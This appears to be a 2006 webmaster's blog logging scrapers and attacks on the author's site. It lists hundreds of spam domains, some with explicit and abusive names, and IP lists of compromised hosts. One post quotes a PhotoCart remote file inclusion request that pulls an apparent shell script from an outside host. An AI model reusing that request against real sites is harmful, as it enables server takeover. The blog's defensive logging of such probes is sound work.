Thursday, December 14, 2006

Another Made For AdSense Scraper Linked to Umax Link Spammer

Another one of the Made For AdSense sites got caught in my snare and sure enough this one also was tied to a huge list of MFA sites and some porn spam sites as well.

Check this out:

http://www.digitbytes.com/
Did a little more research on the source of this scraping:
IP Address: 66.199.247.42
User Agent: lwp-trivial/1.41
It sounded familiar and sure enough it's the same IP address from a previous scraper I wrote about from umax-ppc.net (66.199.247.42) that previously had some virus injection stuff on their server, but I didn't check this time so beware.

Same IP as before, same user agent, still operating from the same location where they were previously hosting sites that injected a virus. It's simply amazing that this stuff is allowed to continue to operate within US data centers, or any data centers for that matter, as it's obvious the hosting companies are more concerned about their bottom line than their reputations or these guys wouldn't have a host.

I used this cool tool to get a list of all the link spam domains currently hosted on that server and it's a staggering list.
Found 730 websites with the IP 66.199.247.42

1) 1.top-10-shop.com
2) 1.yula.name
3) 100-inch.lcd.tv.1day.us
4) 12yo.umax-search.info
5) 1day.us
6) 2005.freeyaho.com
7) 2006.adsname.com
8) 2006.baikal-info.com
9) 2006.dimattic.com
10) 2006.freeyaho.com
11) 2006.hotel-baikal.info
12) 2006.online-info.info
13) 2006.you.freeyaho.com
14) 3.top-10-shop.com
15) 66.199.247.42
16) 8.freeyaho.com
17) a.adsname.com
18) a.freeyaho.com
19) abc-news.free-hit.com
20) academy-award-nominees.ppc-se.net
21) academy-awards.adsname.com
22) acoustic-guitar.1day.us
23) adawere.seblog.name
24) administration.specific911.biz
25) adoption.seblog.name
26) adsname.com
27) adult-gaming.umaxsearch-se.com
28) adultcheck.seblog.name
29) affiliate-books.com
30) air-compressor.seblog.name
31) alberta.ppc-se.com
32) alfred.top-10-shop.com
33) almond-trees.specific911.biz
34) american-immigration.keywords-blog.com
35) analysis.umax-search.info
36) and.1day.name
37) and.dimattic.com
38) and.freeyaho.com
39) and.online-info.info
40) and.rates.the.2006.1day.name
41) and.sampleclip.net
42) and.suggestions.and.real.the.2006.1day.name
43) and.umaxppc.com
44) and.umaxppcsearch.com
45) and.umaxse.net
46) and.webmasterdiscuss.com
47) angels.seblog.name
48) animals.seblog.name
49) anniversary-presents.seblog.name
50) anti-war.online-info.info
51) antiques.seblog.name
52) appraisal.ppc-se.net
53) architecture-record.seblog.name
54) army-tshirts.seblog.name
55) aroma.seblog.name
56) arshan.info
57) art-software.seblog.name
58) art-xxx.com
59) as-seen-on-tv.seblog.name
60) at.the.porn-teen-pic.com
61) auction.seblog.name
62) aussenputz.hockey.seblog.us
63) automotive-information-center.seblog.name
64) babe.seblog.name
65) baby-stroller.top-new-affiliate-programs.com
66) back-pack.seblog.name
67) baikal-hotel.com
68) baikal-info.com
69) baikal-shop.com
70) baikalguide.com
71) baikalsk.com
72) baikalsk.info
73) baikalsk.net
74) bankrupcy.seblog.name
75) baseball-betting-line.seblog.name
76) beach-cruisers.seblog.name
77) beach.top-10-shop.com
78) beaches.weekly-teens.com
79) bermuda-travel.seblog.name
80) best.freeyaho.com
81) best.ppc-se.net
82) best.top-10-shop.com
83) bet-and-win.seblog.name
84) beta-news.board-online.com
85) bicycle-catalog.seblog.name
86) bicycle-classified.seblog.name
87) bicycle-rating.seblog.name
88) bicycle-ratings.seblog.name
89) bicycle-safety.seblog.name
90) bicycle-sizing.seblog.name
91) bifocal-lens.seblog.name
92) bike-helmets.seblog.name
93) bike-sales.seblog.name
94) bikes-cruisers.seblog.name
95) bikini.seblog.name
96) bioresearch.online-info.info
97) blank-cdr-media.seblog.name
98) blog.freeyaho.com
99) blog.hotel-baikal.info
100) blog.porno-sample.com
101) blog.se.ppc-se.com
102) blog.umax-ppc.net
103) blog.umaxppc.net
104) blog.webmasterdiscuss.com
105) blue-dragon.board-online.com
106) blues.seblog.name
107) bmx-bicycle.seblog.name
108) board-online.com
109) boards-ppc-se.adsname.com
110) body-lotion.ads-affiliate-programs.com
111) boehm.seblog.name
112) booky.umaxppc.net
113) borrowing-money.seblog.name
114) british-columbia.ppc-se.com
115) bush-watch.seblog.name
116) business-administration-college.seblog.name
117) business-card-organizer.seblog.name
118) business.top-10-shop.com
119) but.freeyaho.com
120) but.seohuntress.com
121) buy-car.seblog.name
122) buy-diazepam.seblog.name
123) buy.freeyaho.com
124) buying-a-camera.seblog.name
125) cad-drafting.umaxsearch-se.com
126) calculator.seblog.name
127) canada-food-guide.seblog.name
128) canada.seblog.name
129) candy-stores.seblog.name
130) cannon-digital-camcorders.seblog.name
131) canon-g.seblog.name
132) cape-canaveral.board-online.com
133) car-buying-advice.seblog.name
134) carpenters.seblog.name
135) cash-advance-top.com
136) casio-watchband.seblog.name
137) casting.seblog.name
138) casual-clothes.top-new-affiliate-programs.com
139) casual.gamers.online-info.info
140) catalog.adsname.com
141) cd-interest-rate.seblog.name
142) cd-music.seblog.name
143) cd-replication.seblog.name
144) cello-lessons.internet-marketing-online.us
145) certificates.seblog.name
146) chapter.seblog.name
147) cheap-calls.seblog.name
148) cheap-computers.seblog.name
149) cheap.freeyaho.com
150) cheapest-gas.seblog.name
151) chemical-suppliers.seblog.name
152) chicago-bears-tickets.seblog.name
153) chicago.seblog.name
154) chicago.webmasterdiscuss.com
155) child.pornography.images.porno-sample.com
156) chimes.seblog.name
157) chocolate-fondue.seblog.name
158) christmas-crackers.seblog.name
159) christmas-decorations.seblog.name
160) chronometer.seblog.name
161) cinema.seblog.name
162) club.seblog.name
163) cme-courses.board-online.com
164) cobb-county-school.seblog.name
165) cocoa.dimattic.com
166) colloidal.seblog.name
167) columbia.seblog.name
168) commodity-charts.seblog.name
169) community.freeyaho.com
170) computer-cart.seblog.name
171) computers.seblog.name
172) conga.seblog.name
173) contractors.seblog.name
174) converting.seblog.name
175) cosmetic-contacts.webmaster-online.net
176) court-tv-message-boards.seblog.name
177) craft.seblog.name
178) credit-repair.seblog.name
179) critical.board-online.com
180) cruisers.seblog.name
181) csi.seblog.name
182) cufflinks.seblog.name
183) custom-mailbox.seblog.name
184) data-entry.seblog.name
185) data.seblog.name
186) day-camp.seblog.name
187) debt-to-income-ratio.seblog.name
188) decorative-bird-house.seblog.name
189) delaware.freeyaho.com
190) deltagard.top-10-shop.com
191) description.sehuntress.biz
192) desk.seblog.name
193) dessert.seblog.name
194) digital-world-insider.board-online.com
195) dildos.seblog.name
196) dimattic.com
197) dining-set.seblog.name
198) diploma.seblog.name
199) discount-cigarettes.umax-search.biz
200) discount-golf-clubs.seblog.name
201) discovers.computer-screen.ppc-se.info
202) disneyland-ticket.seblog.name
203) distributor-network.seblog.name
204) domain.freeyaho.com
205) domains-affiliate-programs.com
206) down-blouse-picture.seblog.us
207) drama.seblog.name
208) dremel-tool.seblog.name
209) drugs.seblog.name
210) dsdomain.com
211) dsl-available-area.webmaster-online.net
212) dsl-maryland.seblog.name
213) dvd-decoder.seblog.name
214) earth.systems.board-online.com
215) educators.top-10-shop.com
216) electronic-forms.seblog.name
217) electronic-passports.porno-sample.com
218) emergency.seblog.name
219) epson-pos-printer-ribbon.seblog.name
220) epson-products.seblog.name
221) esq-venture.seblog.name
222) eurail.seblog.name
223) eye-exercise.nude-teacher.com
224) faucets.seblog.name
225) ferret-cages.seblog.name
226) ferret.seblog.name
227) film-scanners.1day.us
228) fine-furniture.dsdomain.com
229) fioricet-online.seblog.name
230) firearms-law.seblog.name
231) first.freeyaho.com
232) fishing-industry.seblog.name
233) fitness-training.seblog.name
234) five.sehuntress.com
235) flags.umax-search-search-engine.com
236) flasks.seblog.name
237) flex.dimattic.com
238) flex.seblog.name
239) flexographic.seblog.name
240) florida-long-distance-providers.seblog.name
241) florist-uk.seblog.name
242) fluorescent-ballast.seblog.name
243) flute-lessons.seblog.name
244) foam.seblog.name
245) football.seblog.name
246) ford.seblog.name
247) form.adsname.com
248) form.freeyaho.com
249) form.news.umaxse.net
250) form.umaxppc.net
251) form.umaxse.net
252) form.umaxse.org
253) forum-online.biz
254) forum.adsname.com
255) france-flag.seblog.name
256) fraud.top-10-shop.com
257) free-hit.com
258) free-order.adsname.com
259) free.adsname.com
260) free.freeyaho.com
261) freebies.adsname.com
262) freebies.baikalsk.net
263) freebies.freeyaho.com
264) freebies.seohuntress.com
265) freebies.umaxppc.net
266) freestyle-bikes.seblog.name
267) freeyaho.com
268) french-chocolates.seblog.name
269) full-suspension-bike.seblog.name
270) futons.seblog.name
271) futures-broker.seblog.name
272) futures-charts.top-10-shop.com
273) g-string.seblog.name
274) gambling-rule.seblog.name
275) game-publisher.top-10-shop.com
276) gay-sex.baikalsk.com
277) general.yula.us
278) german-chocolate.seblog.name
279) glass-guard.seblog.name
280) global-positioning-system.ppc-se.com
281) google-ceo.board-online.com
282) google.adsense.ppc-se.com
283) google.top-10-shop.com
284) googlepray.adsname.com
285) gospel.hockey.seblog.us
286) graber.seblog.name
287) grip.seblog.name
288) guess.seblog.name
289) guestbook.adsname.com
290) guestbook.freeyaho.com
291) guestbook.umaxse.info
292) guestbook.umaxse.net
293) guylian.seblog.name
294) hair-style-photo.seblog.name
295) hairs.seblog.name
296) hardcore-fucking.seblog.name
297) health.top-10-shop.com
298) healthcare.seblog.name
299) healthy-appetizers.seblog.name
300) helmet-sale.dsdomain.com
301) helmet.seblog.name
302) herbal-breast-enhancement.seblog.name
303) hi-fi-audio.seblog.name
304) history-of-chocolate-cake.seblog.name
305) hockey-statistics.seblog.name
306) hockey.seblog.us
307) home-building-plans.seblog.name
308) home-decoration.seblog.name
309) home-repair-help.seblog.name
310) home.adsname.com
311) homedrugtest.seblog.name
312) horoscopes.seblog.name
313) hot-jobs-online.com
314) hotel-baikal.com
315) hotel-baikal.info
316) hotel-shop.info
317) hotel.freeyaho.com
318) house-plants.seblog.name
319) houseware.seblog.name
320) how-to-lose-weight.seblog.name
321) hp-ink.dimattic.com
322) hp.seblog.name
323) humidor.seblog.name
324) hybrids.seblog.name
325) i-love-lucy.dimattic.com
326) i-love-you-gifts.umax-search-search-engine.com
327) iguana-cages.seblog.name
328) imported-candy.umax-search.biz
329) impotent.seblog.name
330) inc.seblog.name
331) incorporate-in-new-jersey.seblog.name
332) independent-book-publishers.seblog.name
333) independent-contractor.seblog.name
334) individual-investor-magazine.seblog.name
335) industrial-adhesives.seblog.name
336) industrial-valves.seblog.name
337) info.seblog.name
338) information-broker.seblog.name
339) insect-repellants.porno-sample.com
340) intel.seblog.name
341) internet-marketing-online.us
342) internet-marketing.adsname.com
343) internet.baikal-info.com
344) internet.freeyaho.com
345) interracial.seblog.name
346) investing.seblog.name
347) islander-on-the-beach.seblog.name
348) jaguar-xj.seblog.name
349) jensen-headphones.seblog.name
350) job-opening.seblog.name
351) john-hopkins-medical-center.seblog.name
352) jumpsuits.seblog.name
353) jvc-camcorder-vhsc.seblog.name
354) keynote.seblog.name
355) keyword.qoclick.net
356) keywords-blog.com
357) keywords.freeyaho.com
358) kids-game.seblog.name
359) kilts.seblog.name
360) kiss.seblog.name
361) kodak.seblog.name
362) lake-baikal.info
363) lamp-and-shade.seblog.name
364) las-cruces-sun-news.seblog.name
365) last.top-10-shop.com
366) latest.freeyaho.com
367) latest.ppc-se.com
368) latina.seblog.name
369) learning-computer.umax-search-search-engine.com
370) lease.seblog.name
371) leather-brief-case.seblog.name
372) leather-briefcase.seblog.name
373) lesson.top-10-shop.com
374) lexmark--driver.seblog.name
375) lexmark.specific911.org
376) library-project.tricks.name
377) light-bulb.seblog.name
378) lighting-design.seblog.name
379) lightwave.seblog.name
380) literature.yula.us
381) lithography.seblog.name
382) litter.seblog.name
383) local-telephone-service.seblog.name
384) logo.top-10-shop.com
385) lonestar.seblog.name
386) loop.seblog.name
387) low-intrest-credit-card.seblog.name
388) lowermybills.com.webmasterdiscuss.com
389) macanudo.seblog.name
390) magic.seblog.name
391) magnet.seblog.name
392) major-vulnerability.porno-sample.com
393) managed-futures.seblog.name
394) map-guide.freeyaho.com
395) maps.seblog.name
396) marketing-organization.seblog.name
397) martial-arts-information.seblog.name
398) maryland-local-phone-service.seblog.name
399) may.umax-search.info
400) mechanical-tubing.seblog.name
401) medical-advise.seblog.name
402) medical-references.seblog.name
403) medical-sites.seblog.name
404) medical-symbols.seblog.name
405) men-bracelet.seblog.name
406) mens-dress-watches.seblog.name
407) meta-tags.blog.ppc-se.com
408) mexico-newspaper.seblog.name
409) miami-tv.sampleclip.net
410) milk-chocolate.seblog.name
411) mlb.seblog.name
412) mobile-computing.board-online.com
413) modern-chairs.seblog.name
414) moonstruck-chocolatier.seblog.name
415) most.adsname.com
416) most.freeyaho.com
417) most.woodworking.real.the.2006.1day.name
418) mothers.seblog.us
419) movado.seblog.name
420) msn-search.blog.ppc-se.com
421) multifunction-printers.seblog.name
422) nada-used-car-guide.seblog.name
423) natural-pest-control.seblog.name
424) natural-skin-care.seblog.name
425) ncaa-sports.seblog.name
426) network-traffic-analysis.seblog.name
427) new-car.seblog.name
428) news-analysis.board-online.com
429) news.blog-se.ppc-se.info
430) news.top-10-shop.com
431) news.umaxse.net
432) news.woods-hole-researcher.ppc-se.info
433) nfl-football-picks.seblog.name
434) nfl-stats.seblog.name
435) nhl-picks.seblog.name
436) nintendo.co.ltd.board-online.com
437) nintendo.latest-console.board-online.com
438) nokia-phones.baikal-shop.com
439) noni.seblog.name
440) nude-teacher.com
441) numerous.umax-search.info
442) nursing-home-malpractice.seblog.name
443) nut-tree.seblog.name
444) october.window.tricks.name
445) odds-makers.seblog.name
446) odds.seblog.name
447) off-track-betting.seblog.name
448) ohio-attorney.seblog.name
449) online-info.info
450) online-jewelry.seblog.name
451) online-jukebox.seblog.name
452) online-pharmacy.seblog.name
453) online.freeyaho.com
454) online.online-info.info
455) or.adsname.com
456) or.freeyaho.com
457) or.online-info.info
458) oscar.seblog.name
459) osteo-arthritis.seblog.name
460) out-google.blog.ppc-se.com
461) overthrow-apple-computer.ppc-se.com
462) pa.online-info.info
463) packages.freeyaho.com
464) pads.seblog.name
465) pallet-jack.seblog.name
466) pallet.seblog.name
467) panasonic-product.seblog.name
468) paper-weights.seblog.name
469) parenting.seblog.name
470) pc-game.baikalsk.net
471) pecan-praline.seblog.name
472) penile-erection.seblog.name
473) pentax-zxm.seblog.name
474) personal-finances.seblog.name
475) pet-monkey.seblog.name
476) pet-tags.seblog.name
477) photo-exhibition.seblog.name
478) photographic-paper.seblog.name
479) php.yula.ws
480) pink.seblog.name
481) pittsburgh-newspaper.seblog.name
482) placemat.seblog.name
483) plants.seblog.name
484) playing-cards.seblog.name
485) playstation-3.board-online.com
486) playstation-3.top-10-shop.com
487) plea-bargain.seblog.name
488) plus.sehuntress.com
489) polar-fleece-jackets.seblog.name
490) polaroid-camera.seblog.name
491) polo.seblog.name
492) pop.seblog.name
493) popcorn-machine.seblog.name
494) popular.dimattic.com
495) popular.freeyaho.com
496) porn-teen-pic.com
497) porno-sample.com
498) portable-scooter.seblog.name
499) powerball-lottery.seblog.name
500) ppc-se-provides.top-new-affiliate-programs.com
501) ppc-se.biz
502) ppc-se.com
503) ppc-se.net
504) ppc-se.top.and.reef.adscom.us
505) ppc.adsname.com
506) ppc.freeyaho.com
507) premium-content.top-10-shop.com
508) prescription.seblog.name
509) price.baikal-shop.com
510) print-on-demand.seblog.name
511) print.seblog.name
512) printing-methods.seblog.name
513) producing.porno-sample.com
514) program-directory.adsname.com
515) publications.seblog.name
516) publishing-mergers.seblog.name
517) qoclick-se.adsname.com
518) qoclick.net
519) questions.freeyaho.com
520) questions.specific911.info
521) questions.umax.org
522) questions.umaxppc.net
523) questions.we.freeyaho.com
524) questions.yula.us
525) quick-money.seblog.name
526) rack-case.seblog.name
527) rack.seblog.name
528) radio-blog-club.seblog.name
529) radio-station.seblog.name
530) raliegh-bicycles.seblog.name
531) ralph-lauren-eyewear.seblog.name
532) rates.the.2006.1day.name
533) ray-ban.seblog.name
534) reber.seblog.name
535) register.freeyaho.com
536) replacement-china.seblog.name
537) reseller-porn.com
538) robert.m.carey.porno-sample.com
539) roller-conveyors.seblog.name
540) rose.work-at-home-online.info
541) saab-part.seblog.name
542) safety-glasses.seblog.name
543) same.freeyaho.com
544) sampleclip.net
545) samsung-camcorder.seblog.name
546) samsung.seblog.name
547) santana.seblog.name
548) sapphire-earrings.seblog.name
549) scale.seblog.name
550) scanner.seblog.name
551) school.seblog.name
552) school.top-10-shop.com
553) sconce.seblog.name
554) script.php.baikal-guide.com
555) se-blog.ppc-se.com
556) se.blog.ppc-se.com
557) seblog.name
558) security-vulnerability.specific911.info
559) sehuntress.com
560) sehuntress.info
561) sehuntress.net
562) self-help-videos.seblog.name
563) seohuntress.com
564) sfi.seblog.name
565) shipping-information.seblog.name
566) shopping-services.seblog.name
567) shopping.baikal-shop.com
568) showavailable.com
569) side.specific911.info
570) siemens.seblog.name
571) simple-gifts.seblog.name
572) single-latin-woman.seblog.name
573) site-diagnostics.adsname.com
574) site.adsname.com
575) slager-radio.seblog.name
576) smith.seblog.name
577) so.adsname.com
578) soccer.seblog.name
579) software-giant.blog.ppc-se.com
580) software-products.board-online.com
581) solar-observatories.board-online.com
582) solar.terrestrial.relations.observatory.board-online.com
583) sony-digital-tv.seblog.name
584) sony-dvd-players.sampleclip.net
585) sony-mavica.seblog.name
586) soul.seblog.name
587) spa.seblog.name
588) spacecraft.board-online.com
589) specialty-envelopes.seblog.name
590) specialty-printers.seblog.name
591) specific.adsname.com
592) specific.dimattic.com
593) specific.freeyaho.com
594) specific.reseller-porn.com
595) specific.sampleclip.net
596) specific.top-10-shop.com
597) specific911.biz
598) specific911.info
599) specific911.org
600) specific911.umax-search.info
601) speed-up-internet.seblog.name
602) spells.seblog.name
603) spoon.seblog.name
604) spreadsheet-help.seblog.name
605) standard-bikes.seblog.name
606) star-printer.seblog.name
607) stemware.seblog.name
608) stickers.seblog.name
609) suggestions.adsname.com
610) suggestions.umax-search.info
611) suggestions.umax.org
612) suggestions.umaxse.org
613) suit.seblog.name
614) sunburn.seblog.name
615) sunglases.seblog.name
616) sweepstakes.seblog.name
617) tables.seblog.name
618) tanning-products.seblog.name
619) tax-filing.umax-se.biz
620) tax-rates.seblog.name
621) technologies.seblog.name
622) teen-sex.seblog.name
623) teens.seblog.name
624) telecommunication.seblog.name
625) tennessee.seblog.name
626) tent.top-10-shop.com
627) the-bad.blog.ppc-se.com
628) the-bottom.blog.ppc-se.com
629) the-good.blog.ppc-se.com
630) the.adsname.com
631) the.freeyaho.com
632) the.hotel-baikal.info
633) the.lake-baikal.info
634) the.online-info.info
635) the.porn-teen-pic.com
636) thesaurus.yula.us
637) tips.sehuntress.com
638) titanic.seblog.name
639) titanium.seblog.name
640) tokyo-game-show-2006.board-online.com
641) tommy-hilfiger.seblog.name
642) top-10-shop.com
643) toshiba-copiers.seblog.name
644) tour.seblog.name
645) towel.seblog.name
646) tracking.seblog.name
647) trade-show-display.seblog.name
648) traffic-information.seblog.name
649) training.seblog.name
650) transformers.seblog.name
651) travel-gear.sehuntress.net
652) truffles.seblog.name
653) tube.seblog.name
654) tv-videos.ppc-se.info
655) ultima.seblog.name
656) ultra-mobile.board-online.com
657) umax-ppc.net
658) umax-se.biz
659) umax-se.org
660) umax-search-ppc-se-board.com
661) umax-search-ppc.com
662) umax-search-search-engine.com
663) umax-search.biz
664) umax-search.info
665) umax.org
666) umaxppc.com
667) umaxppc.net
668) umaxppcsearch.com
669) umaxse.biz
670) umaxse.info
671) umaxse.net
672) umaxse.org
673) umaxsearch-ppc-se.com
674) umaxsearch-ppc.com
675) umaxsearch-se.com
676) unique-gift-ideas.seblog.name
677) university.freeyaho.com
678) unusual-clocks.seblog.name
679) usa.freeyaho.com
680) utilities.seblog.name
681) va.top-10-shop.com
682) valium-buy.1day.name
683) vermont-college.seblog.name
684) victorian.seblog.name
685) vintage-eyewear.seblog.name
686) virgin-sexy.com
687) virtual.freeyaho.com
688) virtual.ppc-se.net
689) virtual.seohuntress.com
690) virtual.specific911.info
691) virtual.umax.org
692) we.freeyaho.com
693) weather.sehuntress.com
694) web-design.seblog.name
695) web-statistic.seblog.name
696) web.gambling-laws.affiliate-books.com
697) webmasterdiscuss.com
698) weekly-pay-ppc-se.com
699) weekly-teens.com
700) western-new-england-college.seblog.name
701) white-boards.seblog.name
702) widely.gambling-laws.affiliate-books.com
703) windchimes.seblog.name
704) window.tricks.name
705) wine-of-the-month.seblog.name
706) winery.seblog.name
707) witch.seblog.name
708) wood-blinds.webmasterdiscuss.com
709) wooden-clocks.seblog.name
710) wooden-shelves.seblog.name
711) work-at-home-top.com
712) work-from-home-message-boards.seblog.name
713) work.top-10-shop.com
714) workforce-management.seblog.name
715) workstation.seblog.name
716) world.adsname.com
717) world.freeyaho.com
718) writing-marketing-plan.seblog.name
719) xbox-360.board-online.com
720) xerox-printer-cartridges.seblog.name
721) yahoo-message-boards.seblog.name
722) you.freeyaho.com
723) you.gambling-laws.affiliate-books.com
724) you.valium-buy.1day.name
725) your.freeyaho.com
726) your.umax-search.info
727) yula.name
728) yula.us
729) yula.ws
730) zune.board-online.com
Just pick a random domain name out of the list and see how much spam you can find in the search engines all related to this single domain. This group does it all from guestbook spam to membership profile spam, it's a one stop spam shop.

Note that the purpose of most of these domains is to redirect you to a free parked page on FREEYAHO which appears to be where they make their money.

What a twisted web of MFA, spam and domain parks they've woven.

Wednesday, December 13, 2006

Escalating PhotoCart Vulnerability Attack

I thought this silly little phase had passed and these morons had given up since there were only a few attempts after my last post. Sadly, that wasn't the case and when I got up this morning and checked the site stats I found they mounted an even bigger attack than before.

This is all good, just keep coming at my site and exposing the size of your network, because you're just proving Forest Gump's mother correct as "Stupid is as stupid does."

Here's the path they desperately want, which doesn't exist on my server:

GET /PhotoCart/adminprint.php?path=http://panoplanet.com/c.in?

[UPDATE: It appears panoplanet.com has been taken down within the last couple of hours so you can't see the script anymore. Here are some links to show they were attacking others for a variety of things.]

Note that this is the script they are attempting to inject, which appears to give them shell access from a casual glance of the code.


Here's all the sites involved in today's attack:

70.86.151.130 [82.97.5646.static.theplanet.com.] requested 49 pages as "libwww-perl/5.65"
72.29.74.43 [deso.surpasshosting.com.] requested 53 pages as "libwww-perl/5.805"
72.29.76.238 [72-29-76-238.static.dimenoc.com.] requested 84 pages as "libwww-perl/5.805"
72.22.69.189 [host503.ipowerweb.com.] requested 63 pages as "libwww-perl/5.76"
72.29.83.98 [jet33.hasweb.com.] requested 54 pages as "libwww-perl/5.805"
216.227.220.4 [xena.lunarpages.com.] requested 92 pages as "libwww-perl/5.805"
66.235.221.231 [host131.ipowerweb.com.] requested 107 pages as "libwww-perl/5.805"
204.157.36.20 [unknown20.36.157.204.defenderhosting.com.] requested 56 pages as "libwww-perl/5.805"
72.5.54.51 [web13.lx.host.inap.sea.dotster.net.] requested 75 pages as "libwww-perl/5.65"
64.8.118.5 [64-8-118-5.hsphereweb.com.] requested 75 pages as "libwww-perl/5.801"
189.146.75.42 [dsl-189-146-75-42.prod-infinitum.com.mx.] requested 32 pages as "libwww-perl/5.803"
66.254.98.142 [angels.reflected.net.] requested 62 pages as "libwww-perl/5.803"
69.56.180.222 [de.b4.3845.static.theplanet.com.] requested 64 pages as "libwww-perl/5.805"
205.234.100.65 [unknown65.100.234.205.defenderhosting.com.] requested 64 pages as "libwww-perl/5.805"
83.138.166.13 [s79719.lovehorse.co.uk.] requested 41 pages as "libwww-perl/5.79"
66.103.152.111 [server22.internet-hosting-services.com.] requested 55 pages as "libwww-perl/5.805"
72.249.16.108 [actstwo.com.] requested 32 pages as "libwww-perl/5.805"
67.19.65.132 [84.41.1343.static.theplanet.com.] requested 72 pages as "libwww-perl/5.805"
66.235.206.151 [host223.ipowerweb.com.] requested 66 pages as "libwww-perl/5.805"
69.10.142.59 [unknown.rackforce.com.] requested 108 pages as "libwww-perl/5.805"
64.8.114.14 [web-06.ihservers.com.] requested 83 pages as "libwww-perl/5.801"
67.159.26.99 [.] requested 60 pages as "libwww-perl/5.805"
64.8.118.4 [64-8-118-4.hsphereweb.com.] requested 70 pages as "libwww-perl/5.801"
203.194.134.166 [unknown] requested 22 pages as "libwww-perl/5.65"
81.169.186.195 [unknown] requested 33 pages as "libwww-perl/5.803"
65.38.168.212 [2yellow.veraserve.com.] requested 72 pages as "libwww-perl/5.805"
69.93.107.114 [72.6b.5d45.static.theplanet.com.] requested 5 pages as "libwww-perl/5.805"
194.152.183.230 [unknown] requested 19 pages as "libwww-perl/5.805"
64.8.114.12 [64-8-114-12.yourhostingprovider.net.] requested 67 pages as "libwww-perl/5.801"
207.158.61.3 [ns1.control8.com.] requested 77 pages as "libwww-perl/5.79"
85.214.19.18 [copyworld-kiel.de.] requested 25 pages as "libwww-perl/5.69"
62.4.70.180 [62.4.70.180.fantasyvirtual.com.] requested 35 pages as "libwww-perl/5.803"
203.146.140.221 [unknown] requested 12 pages as "libwww-perl/5.64"
89.108.80.229 [server2.vlr.ru.] requested 40 pages as "libwww-perl/5.805"
207.99.63.90 [www.myonlinephotos.net.] requested 31 pages as "libwww-perl/5.79"
203.167.111.133 [133.111.167.203.assigned.static.eastern-tele.com.] requested 11 pages as "libwww-perl/5.79"
81.183.219.157 [dsl51B7DB9D.fixip.t-online.hu.] requested 12 pages as "libwww-perl/5.803"
62.221.213.68 [unknown] requested 9 pages as "libwww-perl/5.65"
88.149.156.142 [www.futurweb.info.] requested 24 pages as "libwww-perl/5.803"
220.134.22.185 [main.ethantw.tw.] requested 17 pages as "libwww-perl/5.805"
140.117.73.1 [finance.nsysu.edu.tw.] requested 9 pages as "libwww-perl/5.805"
81.181.89.42 [cipnet.is.ew.ro.] requested 30 pages as "libwww-perl/5.805"
203.167.88.76 [unknown] requested 14 pages as "libwww-perl/5.65"
195.242.211.253 [faq.ecobike.de.] requested 24 pages as "libwww-perl/5.48"
82.210.7.28 [82.210.7.28.rev.worldbone.de.] requested 29 pages as "libwww-perl/5.803"


Maybe it's time I send a few letters to the owners of these compromised servers and see what happens.

Thursday, December 07, 2006

Day Two of the Photo Cart Attack

Very interesting to watch this Photo Cart vulnerability probe continue as some of the same IPs attacked yet again but there were some new locations joining in the assault.

The morons launching this assault just didn't seem to understand that my site doesn't run Photo Cart when they attacked me yesterday and like a bunch of deaf, dumb and blind lemmings did they same stupid thing again today.

Here's todays list of sites trying to attack:

72.29.83.98 [jet33.hasweb.com.] requested 47 pages as "libwww-perl/5.805"
72.29.76.238 [72-29-76-238.static.dimenoc.com.] requested 47 pages as "libwww-perl/5.805"
66.7.193.220 [interzone.shiftinteractive.net.] requested 100 pages as "libwww-perl/5.805"
216.55.166.52 [216-55-166-52.dedicated.abac.net.] requested 8 pages as "libwww-perl/5.803"
72.29.82.174 [pass57.dizinc.com.] requested 4 pages as "libwww-perl/5.805"
72.29.74.43 [deso.surpasshosting.com.] requested 8 pages as "libwww-perl/5.805"
67.19.74.138 [www2.comradelycertitude.com.] requested 117 pages as "libwww-perl/5.805"
64.8.118.4 [64-8-118-4.hsphereweb.com.] requested 108 pages as "libwww-perl/5.801"
64.8.118.5 [64-8-118-5.hsphereweb.com.] requested 108 pages as "libwww-perl/5.801"
66.70.121.80 [unknown] requested 12 pages as "libwww-perl/5.65"
66.40.38.148 [host148.maxim.net.] requested 8 pages as "libwww-perl/5.65"
67.19.224.66 [lamda.asmallorange.com.] requested 18 pages as "libwww-perl/5.805"
208.101.29.107 [asprojectos.com.] requested 93 pages as "libwww-perl/5.805"
204.11.234.28 [vn1133.fireboxhosting.com.] requested 80 pages as "libwww-perl/5.805"
66.55.78.18 [66-55-78-18.yourhostingprovider.net.] requested 48 pages as "libwww-perl/5.801"
81.181.15.6 [mail.cipnet.ro.] requested 36 pages as "libwww-perl/5.805"
209.172.35.53 [ip-209-172-35-53.reverse.privatedns.com.] requested 38 pages as "libwww-perl/5.79"
69.10.142.59 [unknown.rackforce.com.] requested 17 pages as "libwww-perl/5.805"
66.39.177.8 [shweet.bendug.org.] requested 2 pages as "gnootBot"
189.146.75.42 [dsl-189-146-75-42.prod-infinitum.com.mx.] requested 17 pages as "libwww-perl/5.803"
219.93.90.33 [unknown] requested 20 pages as "libwww-perl/5.65"
84.31.119.195 [cp113881-a.dbsch1.nb.home.nl.] requested 1 pages as "Ecrw7jipqgslb7fygbgqpshwirc"
203.167.111.133 [133.111.167.203.assigned.static.eastern-tele.com.] requested 16 pages as "libwww-perl/5.79"
158.66.1.12 [service2.mg.gov.pl.] requested 76 pages as "libwww-perl/5.65"
66.240.252.55 [su9325255.aspadmin.net.] requested 12 pages as "libwww-perl/5.803"
68.186.32.50 [68-186-32-50.static.scrm.ca.charter.com.] requested 15 pages as "libwww-perl/5.79"
72.51.34.179 [server1.reptileforums.com.] requested 11 pages as "libwww-perl/5.79"
209.47.139.138 [server.privatelabelarticlesite.net.] requested 2 pages as "libwww-perl/5.805"
195.242.211.253 [faq.ecobike.de.] requested 1 pages as "libwww-perl/5.48"BAD_AGENT: 67.159.26.45 [sanalsistem.net.] requested 7 pages as "libwww-perl/5.805"
163.178.79.2 [server.micit.go.cr.] requested 9 pages as "libwww-perl/5.803"
I truly feel bad for any idiots running Photo Cart about now.

Wednesday, December 06, 2006

TopicBlogs Steps Over The Line

TopicBlogs hasn't even launched yet but they managed to piss me off stepping over the boundary.

The RSS feed is fair game, but pulling the linked pages without permission is NOT fair game.

Here's an example:

72.36.205.106 "GET /rss_feed.xml HTTP/1.0" "topicblogs/0.9"
72.36.205.106 "GET /blogpage2.html HTTP/1.0" "topicblogs/0.9"
72.36.205.106 "GET /blogpage3.html HTTP/1.0" "topicblogs/0.9"
72.36.205.106 "GET /blogpage4.html HTTP/1.0" "topicblogs/0.9"
72.36.205.106 "GET /blogpage5.html HTTP/1.0" "topicblogs/0.9"
72.36.205.106 "GET /blogpage6.html HTTP/1.0" "topicblogs/0.9"
